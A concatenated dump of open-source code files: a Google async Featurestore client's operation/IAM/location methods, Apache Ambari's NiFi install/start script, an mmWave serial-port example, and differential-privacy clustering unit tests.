) -> None:
r"""Starts asynchronous cancellation on a long-running operation.
The server makes a best effort to cancel the operation, but success
is not guaranteed. If the server doesn't support this method, it returns
`google.rpc.Code.UNIMPLEMENTED`.
Args:
request (:class:`~.operations_pb2.CancelOperationRequest`):
The request object. Request message for
`CancelOperation` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
None
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = operations_pb2.CancelOperationRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._client._transport.cancel_operation,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
async def wait_operation(
self,
request: Optional[operations_pb2.WaitOperationRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operations_pb2.Operation:
r"""Waits until the specified long-running operation is done or reaches at most
a specified timeout, returning the latest state.
If the operation is already done, the latest state is immediately returned.
If the timeout specified is greater than the default HTTP/RPC timeout, the HTTP/RPC
timeout is used. If the server does not support this method, it returns
`google.rpc.Code.UNIMPLEMENTED`.
Args:
request (:class:`~.operations_pb2.WaitOperationRequest`):
The request object. Request message for
`WaitOperation` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.operations_pb2.Operation:
An ``Operation`` object.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = operations_pb2.WaitOperationRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._client._transport.wait_operation,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def set_iam_policy(
self,
request: Optional[iam_policy_pb2.SetIamPolicyRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> policy_pb2.Policy:
r"""Sets the IAM access control policy on the specified function.
Replaces any existing policy.
Args:
request (:class:`~.iam_policy_pb2.SetIamPolicyRequest`):
The request object. Request message for `SetIamPolicy`
method.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.policy_pb2.Policy:
Defines an Identity and Access Management (IAM) policy.
It is used to specify access control policies for Cloud
Platform resources.
A ``Policy`` is a collection of ``bindings``. A
``binding`` binds one or more ``members`` to a single
``role``. Members can be user accounts, service
accounts, Google groups, and domains (such as G Suite).
A ``role`` is a named list of permissions (defined by
IAM or configured by users). A ``binding`` can
optionally specify a ``condition``, which is a logic
expression that further constrains the role binding
based on attributes about the request and/or target
resource.
**JSON Example**
::
{
"bindings": [
{
"role": "roles/resourcemanager.organizationAdmin",
"members": [
"user:mike@example.com",
"group:admins@example.com",
"domain:google.com",
"serviceAccount:my-project-id@appspot.gserviceaccount.com"
]
},
{
"role": "roles/resourcemanager.organizationViewer",
"members": ["user:eve@example.com"],
"condition": {
"title": "expirable access",
"description": "Does not grant access after Sep 2020",
"expression": "request.time <
timestamp('2020-10-01T00:00:00.000Z')",
}
}
]
}
**YAML Example**
::
bindings:
- members:
- user:mike@example.com
- group:admins@example.com
- domain:google.com
- serviceAccount:my-project-id@appspot.gserviceaccount.com
role: roles/resourcemanager.organizationAdmin
- members:
- user:eve@example.com
role: roles/resourcemanager.organizationViewer
condition:
title: expirable access
description: Does not grant access after Sep 2020
expression: request.time < timestamp('2020-10-01T00:00:00.000Z')
For a description of IAM and its features, see the `IAM
developer's
guide <https://cloud.google.com/iam/docs>`__.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = iam_policy_pb2.SetIamPolicyRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._client._transport.set_iam_policy,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("resource", request.resource),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def get_iam_policy(
self,
request: Optional[iam_policy_pb2.GetIamPolicyRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> policy_pb2.Policy:
r"""Gets the IAM access control policy for a function.
Returns an empty policy if the function exists and does not have a
policy set.
Args:
request (:class:`~.iam_policy_pb2.GetIamPolicyRequest`):
The request object. Request message for `GetIamPolicy`
method.
retry (google.api_core.retry.Retry): Designation of what errors, if
any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.policy_pb2.Policy:
Defines an Identity and Access Management (IAM) policy.
It is used to specify access control policies for Cloud
Platform resources.
A ``Policy`` is a collection of ``bindings``. A
``binding`` binds one or more ``members`` to a single
``role``. Members can be user accounts, service
accounts, Google groups, and domains (such as G Suite).
A ``role`` is a named list of permissions (defined by
IAM or configured by users). A ``binding`` can
optionally specify a ``condition``, which is a logic
expression that further constrains the role binding
based on attributes about the request and/or target
resource.
**JSON Example**
::
{
"bindings": [
{
"role": "roles/resourcemanager.organizationAdmin",
"members": [
"user:mike@example.com",
"group:admins@example.com",
"domain:google.com",
"serviceAccount:my-project-id@appspot.gserviceaccount.com"
]
},
{
"role": "roles/resourcemanager.organizationViewer",
"members": ["user:eve@example.com"],
"condition": {
"title": "expirable access",
"description": "Does not grant access after Sep 2020",
"expression": "request.time <
timestamp('2020-10-01T00:00:00.000Z')",
}
}
]
}
**YAML Example**
::
bindings:
- members:
- user:mike@example.com
- group:admins@example.com
- domain:google.com
- serviceAccount:my-project-id@appspot.gserviceaccount.com
role: roles/resourcemanager.organizationAdmin
- members:
- user:eve@example.com
role: roles/resourcemanager.organizationViewer
condition:
title: expirable access
description: Does not grant access after Sep 2020
expression: request.time < timestamp('2020-10-01T00:00:00.000Z')
For a description of IAM and its features, see the `IAM
developer's
guide <https://cloud.google.com/iam/docs>`__.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = iam_policy_pb2.GetIamPolicyRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._client._transport.get_iam_policy,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("resource", request.resource),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def test_iam_permissions(
self,
request: Optional[iam_policy_pb2.TestIamPermissionsRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> iam_policy_pb2.TestIamPermissionsResponse:
r"""Tests the specified IAM permissions against the IAM access control
policy for a function.
If the function does not exist, this will return an empty set
of permissions, not a NOT_FOUND error.
Args:
request (:class:`~.iam_policy_pb2.TestIamPermissionsRequest`):
The request object. Request message for
`TestIamPermissions` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.iam_policy_pb2.TestIamPermissionsResponse:
Response message for ``TestIamPermissions`` method.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = iam_policy_pb2.TestIamPermissionsRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._client._transport.test_iam_permissions,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("resource", request.resource),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def get_location(
self,
request: Optional[locations_pb2.GetLocationRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> locations_pb2.Location:
r"""Gets information about a location.
Args:
request (:class:`~.location_pb2.GetLocationRequest`):
The request object. Request message for
`GetLocation` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.location_pb2.Location:
Location object.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = locations_pb2.GetLocationRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._client._transport.get_location,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def list_locations(
self,
request: Optional[locations_pb2.ListLocationsRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> locations_pb2.ListLocationsResponse:
r"""Lists information about the supported locations for this service.
Args:
request (:class:`~.location_pb2.ListLocationsRequest`):
The request object. Request message for
`ListLocations` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.location_pb2.ListLocationsResponse:
Response message for ``ListLocations`` method.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = locations_pb2.ListLocationsRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._client._transport.list_locations,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def __aenter__(self) -> "FeaturestoreServiceAsyncClient":
return self
async def __aexit__(self, exc_type, exc, tb):
await self.transport.close()
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=package_version.__version__
)
__all__ = ("FeaturestoreServiceAsyncClient",)
|
0a7b3bedb8c1a28fe000983168420bc4ab9f5082
|
0529610da235bac1490c4f0b28a58258f05f116c
|
/contrib/management-packs/hdf-ambari-mpack/src/main/resources/common-services/NIFI/1.0.0/package/scripts/nifi.py
|
6936dce7534f32b2343893174ca48775a684e17c
|
[
"GPL-1.0-or-later",
"GPL-2.0-or-later",
"OFL-1.1",
"MS-PL",
"AFL-2.1",
"GPL-2.0-only",
"Python-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
apache/ambari
|
be1616f332615ef55fc1a47e84353f3e5a45732d
|
23881f23577a65de396238998e8672d6c4c5a250
|
refs/heads/trunk
| 2023-08-31T23:01:31.954106
| 2023-08-28T06:29:01
| 2023-08-28T06:29:01
| 2,442,457
| 2,078
| 1,957
|
Apache-2.0
| 2023-09-14T16:56:03
| 2011-09-23T07:00:08
|
Java
|
UTF-8
|
Python
| false
| false
| 10,204
|
py
|
nifi.py
|
#!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys, nifi_ca_util, os, pwd, grp, signal, time, glob, socket, json
from resource_management.core import sudo
from resource_management import *
from subprocess import call
from setup_ranger_nifi import setup_ranger_nifi
reload(sys)
sys.setdefaultencoding('utf8')
class Master(Script):
def install(self, env):
import params
import status_params
self.install_packages(env)
Directory([params.nifi_node_dir],
owner=params.nifi_user,
group=params.nifi_group,
create_parents=True,
recursive_ownership=True
)
#update the configs specified by user
self.configure(env, True)
Execute('touch ' + params.nifi_node_log_file, user=params.nifi_user)
def configure(self, env, isInstall=False, is_starting = False):
import params
import status_params
env.set_params(params)
env.set_params(status_params)
#create the log, pid, conf dirs if not already present
Directory([status_params.nifi_pid_dir, params.nifi_node_log_dir, params.nifi_internal_dir, params.nifi_database_dir, params.nifi_flowfile_repo_dir, params.nifi_content_repo_dir_default, params.nifi_provenance_repo_dir_default, params.nifi_config_dir, params.nifi_flow_config_dir, params.nifi_state_dir, params.lib_dir],
owner=params.nifi_user,
group=params.nifi_group,
create_parents=True,
recursive_ownership=True
)
# On some OS this folder may not exist, so we will create it before pushing files there
Directory(params.limits_conf_dir,
create_parents = True,
owner='root',
group='root'
)
File(os.path.join(params.limits_conf_dir, 'nifi.conf'),
owner='root',
group='root',
mode=0644,
content=Template("nifi.conf.j2")
)
ca_client_script = nifi_ca_util.get_toolkit_script('tls-toolkit.sh')
File(ca_client_script, mode=0755)
if params.nifi_ca_host and params.nifi_ssl_enabled:
ca_client_json = os.path.realpath(os.path.join(params.nifi_config_dir, 'nifi-certificate-authority-client.json'))
ca_client_dict = nifi_ca_util.load(ca_client_json)
if is_starting:
if params.nifi_toolkit_tls_regenerate:
nifi_ca_util.move_keystore_truststore(ca_client_dict)
ca_client_dict = {}
else:
nifi_ca_util.move_keystore_truststore_if_necessary(ca_client_dict, params.nifi_ca_client_config)
nifi_ca_util.overlay(ca_client_dict, params.nifi_ca_client_config)
nifi_ca_util.dump(ca_client_json, ca_client_dict)
if is_starting:
Execute('JAVA_HOME='+params.jdk64_home+' '+ca_client_script+' client -F -f '+ca_client_json, user=params.nifi_user)
nifi_ca_util.update_nifi_properties(nifi_ca_util.load(ca_client_json), params.nifi_properties)
#write out nifi.properties
PropertiesFile(params.nifi_config_dir + '/nifi.properties',
properties = params.nifi_properties,
mode = 0400,
owner = params.nifi_user,
group = params.nifi_group)
#write out boostrap.conf
bootstrap_content=InlineTemplate(params.nifi_boostrap_content)
File(format("{params.nifi_config_dir}/bootstrap.conf"), content=bootstrap_content, owner=params.nifi_user, group=params.nifi_group, mode=0400)
#write out logback.xml
logback_content=InlineTemplate(params.nifi_node_logback_content)
File(format("{params.nifi_config_dir}/logback.xml"), content=logback_content, owner=params.nifi_user, group=params.nifi_group, mode=0400)
#write out state-management.xml
statemgmt_content=InlineTemplate(params.nifi_state_management_content)
File(format("{params.nifi_config_dir}/state-management.xml"), content=statemgmt_content, owner=params.nifi_user, group=params.nifi_group, mode=0400)
#write out authorizers file
authorizers_content=InlineTemplate(params.nifi_authorizers_content)
File(format("{params.nifi_config_dir}/authorizers.xml"), content=authorizers_content, owner=params.nifi_user, group=params.nifi_group, mode=0400)
#write out login-identity-providers.xml
login_identity_providers_content=InlineTemplate(params.nifi_login_identity_providers_content)
File(format("{params.nifi_config_dir}/login-identity-providers.xml"), content=login_identity_providers_content, owner=params.nifi_user, group=params.nifi_group, mode=0400)
#write out nifi-env in bin as 0755 (see BUG-61769)
env_content=InlineTemplate(params.nifi_env_content)
File(format("{params.bin_dir}/nifi-env.sh"), content=env_content, owner=params.nifi_user, group=params.nifi_group, mode=0755)
#write out bootstrap-notification-services.xml
boostrap_notification_content=InlineTemplate(params.nifi_boostrap_notification_content)
File(format("{params.nifi_config_dir}/bootstrap-notification-services.xml"), content=boostrap_notification_content, owner=params.nifi_user, group=params.nifi_group, mode=0400)
def stop(self, env):
import params
import status_params
Execute ('export JAVA_HOME='+params.jdk64_home+';'+params.bin_dir+'/nifi.sh stop >> ' + params.nifi_node_log_file, user=params.nifi_user)
if os.path.isfile(status_params.nifi_node_pid_file):
sudo.unlink(status_params.nifi_node_pid_file)
def start(self, env):
import params
import status_params
self.configure(env, is_starting = True)
setup_ranger_nifi(upgrade_type=None)
# Write out flow.xml.gz to internal dir only if AMS installed (must be writable by Nifi)
# only during first install. It is used to automate setup of Ambari metrics reporting task in Nifi
if params.metrics_collector_host and params.nifi_ambari_reporting_enabled and self.check_is_fresh_install(self):
Execute('echo "First time setup so generating flow.xml.gz" >> ' + params.nifi_node_log_file, user=params.nifi_user)
flow_content=InlineTemplate(params.nifi_flow_content)
File(format("{params.nifi_flow_config_dir}/flow.xml"), content=flow_content, owner=params.nifi_user, group=params.nifi_group, mode=0600)
Execute(format("cd {params.nifi_flow_config_dir}; mv flow.xml.gz flow_$(date +%d-%m-%Y).xml.gz ;"),user=params.nifi_user,ignore_failures=True)
Execute(format("cd {params.nifi_flow_config_dir}; gzip flow.xml;"), user=params.nifi_user)
Execute ('export JAVA_HOME='+params.jdk64_home+';'+params.bin_dir+'/nifi.sh start >> ' + params.nifi_node_log_file, user=params.nifi_user)
#If nifi pid file not created yet, wait a bit
if not os.path.isfile(status_params.nifi_pid_dir+'/nifi.pid'):
Execute ('sleep 5')
def status(self, env):
import status_params
check_process_status(status_params.nifi_node_pid_file)
def check_is_fresh_install(self, env):
"""
Checks if fresh nifi install by checking if zk dir exists
:return:
"""
import params, re
from resource_management.core import shell
from resource_management.core.exceptions import Fail
from resource_management.core.logger import Logger
ZK_CONNECT_ERROR = "ConnectionLoss"
ZK_NODE_NOT_EXIST = "Node does not exist"
zookeeper_queried = False
is_fresh_nifi_install = True
# For every zk server try to find nifi zk dir
zookeeper_server_list = params.config['clusterHostInfo']['zookeeper_hosts']
for zookeeper_server in zookeeper_server_list:
# Determine where the zkCli.sh shell script is
zk_command_location = os.path.join(params.stack_root, "current", "zookeeper-client", "bin", "zkCli.sh")
if params.stack_version_buildnum is not None:
zk_command_location = os.path.join(params.stack_root, params.stack_version_buildnum, "zookeeper", "bin", "zkCli.sh")
# create the ZooKeeper query command e.g.
# /usr/hdf/current/zookeeper-client/bin/zkCli.sh -server node:2181 ls /nifi
command = "{0} -server {1}:{2} ls {3}".format(
zk_command_location, zookeeper_server, params.zookeeper_port, params.nifi_znode)
# echo 'ls /nifi' | /usr/hdf/current/zookeeper-client/bin/zkCli.sh -server node:2181
#command = "echo 'ls {3}' | {0} -server {1}:{2}".format(
# zk_command_location, zookeeper_server, params.zookeeper_port, params.nifi_znode)
Logger.info("Running command: " + command)
code, out = shell.call(command, logoutput=True, quiet=False, timeout=20)
if not out or re.search(ZK_CONNECT_ERROR, out):
Logger.info("Unable to query Zookeeper: " + zookeeper_server + ". Skipping and trying next ZK server")
continue
elif re.search(ZK_NODE_NOT_EXIST, out):
Logger.info("Nifi ZNode does not exist, so must be fresh install of Nifi: " + params.nifi_znode)
zookeeper_queried = True
is_fresh_nifi_install = True
break
else:
Logger.info("Nifi ZNode already exists, so must not be a fresh install of Nifi: " + params.nifi_znode)
zookeeper_queried = True
is_fresh_nifi_install = False
break
# fail if the ZK data could not be queried
if not zookeeper_queried:
raise Fail("Unable to query for znode on on any of the following ZooKeeper hosts: {0}. Please ensure Zookeepers are started and retry".format(
zookeeper_server_list))
else:
return is_fresh_nifi_install
if __name__ == "__main__":
Master().execute()
|
8a713ad8f46f855244453043b8f026a25b0c5271
|
979848357aacde78f48cfda4d4ee5db442a4f5ca
|
/TMD_kv/Python/TMD_kv_ex0.py
|
3ca411551e6c9f53a219640e4eee4f25550d3033
|
[] |
no_license
|
bigheadG/mmWave
|
a41fb42b12c757b1af2fb1476cb27e3fcf9592bf
|
73823df8daaadce4347d94128c79c40e01759f77
|
refs/heads/master
| 2023-08-21T13:20:16.042609
| 2023-08-16T03:03:11
| 2023-08-16T03:03:11
| 175,160,017
| 114
| 24
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 668
|
py
|
TMD_kv_ex0.py
|
'''
Target Monitor Detect (ISK) for BM-201" : 2020/03/09
ex0:
Hardware: Batman-201 ISK
(1)Download lib:
install:
~#sudo pip intall mmWave
update:
~#sudo pip install mmWave -U
'''
import serial
import numpy as np
from mmWave import trafficMD_kv
#import trafficMD as TrafficMD
port = serial.Serial("COM189",baudrate = 921600, timeout = 0.5)
pm = trafficMD_kv.tmdISK_kv(port)
def uartGetdata(name):
print("mmWave: {:} example:".format(name))
port.flushInput()
while True:
(dck,v0,v1)=pm.tmdRead(False)
if dck:
print("=====v0 info.=====")
print(v0)
print("=======v1=====")
print(v1)
uartGetdata("Traffic Monitor Detect (TMD) for BM-201")
|
b6d9fc86612198ce662b3a0242c7cf0892a7c2ad
|
a1050bdd29edf32635d3d693afb6e3841fddb5d0
|
/learning/clustering/clustering_algorithm_test.py
|
8a5de7dc7316e28bd8a27a610ae196cd24e01207
|
[
"Apache-2.0",
"BSD-3-Clause"
] |
permissive
|
google/differential-privacy
|
fd2eafae20f2b5b5f9ea814193d4b9e0c12652ca
|
5e09d51dee26c4c6a5a805a288e19285f3983e6d
|
refs/heads/main
| 2023-09-03T09:07:58.451237
| 2023-08-28T14:03:33
| 2023-08-28T15:14:39
| 206,320,938
| 2,969
| 397
|
Apache-2.0
| 2023-08-14T07:55:30
| 2019-09-04T13:04:15
|
Go
|
UTF-8
|
Python
| false
| false
| 7,722
|
py
|
clustering_algorithm_test.py
|
# Copyright 2021 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for clustering_algorithm."""
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
from clustering import clustering_algorithm
from clustering import clustering_params
class ClusteringTest(parameterized.TestCase):
def test_clustering_result_value_errors_unequal_dim(self):
centers = np.array([[0, 0], [100, 100]])
datapoints = np.array([[1, 0, 1], [101, 101, 99], [4, 0, 4]])
labels = np.array([0, 1, 1], dtype=int)
data = clustering_params.Data(datapoints=datapoints, radius=200)
with self.assertRaises(ValueError):
clustering_algorithm.ClusteringResult(data, centers, labels, loss=1.0)
def test_clustering_result_value_errors_unequal_points(self):
centers = np.array([[0, 0, 0], [1, 1, 1]])
datapoints = np.array([[1, 0, 1], [101, 101, 99], [4, 0, 4]])
labels = np.array([0, 1], dtype=int)
data = clustering_params.Data(datapoints=datapoints, radius=200)
with self.assertRaises(ValueError):
clustering_algorithm.ClusteringResult(data, centers, labels, loss=1.0)
def test_clustering_result_value_errors_labels_out_of_bounds(self):
centers = np.array([[0, 0, 0], [1, 1, 1]])
datapoints = np.array([[1, 0, 1], [101, 101, 99], [4, 0, 4]])
data = clustering_params.Data(datapoints=datapoints, radius=200)
for labels in [
np.array([-1, 0, 1], dtype=int),
np.array([0, 1, 2], dtype=int),
np.array([0, 1, 1.1])
]:
with self.assertRaises(ValueError):
clustering_algorithm.ClusteringResult(data, centers, labels, loss=1.0)
def test_clustering_result_value_errors_loss_label_only_one_init(self):
centers = np.zeros((2, 3))
datapoints = np.zeros((4, 3))
data = clustering_params.Data(datapoints=datapoints, radius=2)
cluster_labels = np.array([0, 0, 1, 1], dtype=int)
loss = 1.0
with self.assertRaises(ValueError):
clustering_algorithm.ClusteringResult(data, centers, cluster_labels)
with self.assertRaises(ValueError):
clustering_algorithm.ClusteringResult(data, centers, loss=loss)
def test_get_clustering_result(self):
centers = np.array([[0, 0, 0], [100, 100, 100]])
datapoints = np.array([[1, 0, 1], [101, 101, 99], [4, 0, 4]])
data = clustering_params.Data(datapoints=datapoints, radius=200)
clustering_result = clustering_algorithm.ClusteringResult(data, centers)
self.assertLen(data.datapoints, 3)
for i, datapoint in enumerate(clustering_result.data.datapoints):
self.assertSequenceAlmostEqual(datapoints[i], datapoint)
self.assertLen(centers, 2)
for i, center in enumerate(clustering_result.centers):
self.assertSequenceAlmostEqual(centers[i], center)
self.assertListEqual(list(clustering_result.labels), [0, 1, 0])
self.assertAlmostEqual(clustering_result.loss, 37)
def test_clipped_data_used_for_clustering_and_not_result_calculation(
self):
# Clipped datapoints (radius=1): [[0.3, 0.2], [0.6, 0.8], [0.6, 0.8]]
datapoints = np.array([[0.3, 0.2], [3, 4], [6, 8]])
# Very small radius means the datapoint will be clipped for the center
# calculation.
data = clustering_params.Data(datapoints=datapoints, radius=1)
# No noise
privacy_param = clustering_params.DifferentialPrivacyParam(np.inf)
# No branching, the coreset will just be the average of the points
tree_param = clustering_params.TreeParam(1, 1, 0)
clustering_result = clustering_algorithm.private_lsh_clustering(
3,
data,
privacy_param,
tree_param=tree_param,
multipliers=clustering_params.PrivacyCalculatorMultiplier())
# Center should be calculated using the clipped data.
expected_center = np.array([0.5, 0.6])
self.assertLen(clustering_result.centers, 1)
self.assertSequenceAlmostEqual(clustering_result.centers[0],
expected_center)
self.assertListEqual(list(clustering_result.labels), [0, 0, 0])
# Loss calculation should still be relative to the original points.
self.assertAlmostEqual(clustering_result.loss, 103.02)
class ClusteringMetricsTest(absltest.TestCase):
def test_value_error_no_true_labels(self):
datapoints, radius = np.zeros(shape=(6, 4)), 1.0
data = clustering_params.Data(datapoints, radius)
centers = np.zeros(shape=(3, 4))
cluster_labels = np.array([0, 0, 1, 1, 2, 2])
clustering_result = clustering_algorithm.ClusteringResult(
data, centers, cluster_labels, loss=1.0)
with self.assertRaises(ValueError):
clustering_result.cross_label_histogram()
with self.assertRaises(ValueError):
clustering_result.get_clustering_metrics()
def test_get_clustering_metrics(self):
datapoints, radius = np.zeros(shape=(6, 4)), 1.0
labels = np.array([0, 0, 0, 1, 1, 1])
data = clustering_params.Data(datapoints, radius, labels)
centers = np.zeros(shape=(3, 4))
cluster_labels = np.array([0, 0, 1, 1, 2, 2])
clustering_result = clustering_algorithm.ClusteringResult(
data, centers, cluster_labels, loss=1.0)
clustering_metrics = clustering_result.get_clustering_metrics()
expected_cross_label_histogram = np.array([[2, 0], [1, 1], [0, 2]],
dtype=int)
self.assertTrue((clustering_metrics.cross_label_histogram ==
expected_cross_label_histogram).all())
self.assertEqual(clustering_metrics.num_points, 6)
self.assertEqual(clustering_metrics.dominant_label_correct_count, 5)
self.assertAlmostEqual(clustering_metrics.dominant_label_accuracy, 5 / 6)
self.assertEqual(clustering_metrics.true_pairs, 6)
self.assertEqual(clustering_metrics.true_nonmatch_count, 4)
self.assertAlmostEqual(clustering_metrics.true_nonmatch_frac, 4 / 6)
self.assertEqual(clustering_metrics.false_pairs, 9)
self.assertEqual(clustering_metrics.false_match_count, 1)
self.assertAlmostEqual(clustering_metrics.false_match_frac, 1 / 9)
class ClusteringEdgeCaseTest(parameterized.TestCase):
baseline_k: int
baseline_privacy_param: clustering_params.DifferentialPrivacyParam
def setUp(self):
super().setUp()
self.baseline_k = 2
self.baseline_privacy_param = clustering_params.DifferentialPrivacyParam()
def test_small_dataset(self):
datapoints = np.array([[0.3, 0.2]])
data = clustering_params.Data(datapoints=datapoints, radius=1)
self.assertIsNotNone(
clustering_algorithm.private_lsh_clustering(
self.baseline_k,
data,
self.baseline_privacy_param,
multipliers=clustering_params.PrivacyCalculatorMultiplier(),
)
)
def test_privacy_budget_split_does_not_error(self):
datapoints = np.array([[0.3, 0.2]])
data = clustering_params.Data(datapoints=datapoints, radius=1)
self.assertIsNotNone(
clustering_algorithm.private_lsh_clustering(
self.baseline_k,
data,
self.baseline_privacy_param,
privacy_budget_split=clustering_params.PrivacyBudgetSplit(),
)
)
if __name__ == '__main__':
absltest.main()
|
606619f59f2b94d0431706b7bac3032079714749
|
fb05fb9f9f7fe7eb91072ad62c10200cae10acc6
|
/src/borg/testsuite/archive.py
|
cefd6293b733ddb1617177a2f250eaa10661d076
|
[
"BSD-3-Clause",
